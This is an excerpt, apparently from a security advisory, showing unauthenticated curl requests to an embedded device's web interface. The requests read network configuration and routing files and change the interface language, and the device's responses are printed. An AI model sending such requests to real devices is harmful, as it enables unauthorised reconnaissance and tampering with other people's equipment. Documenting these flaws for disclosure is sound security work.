curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1
-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L
curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0
curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English
[... and more]
[ETX]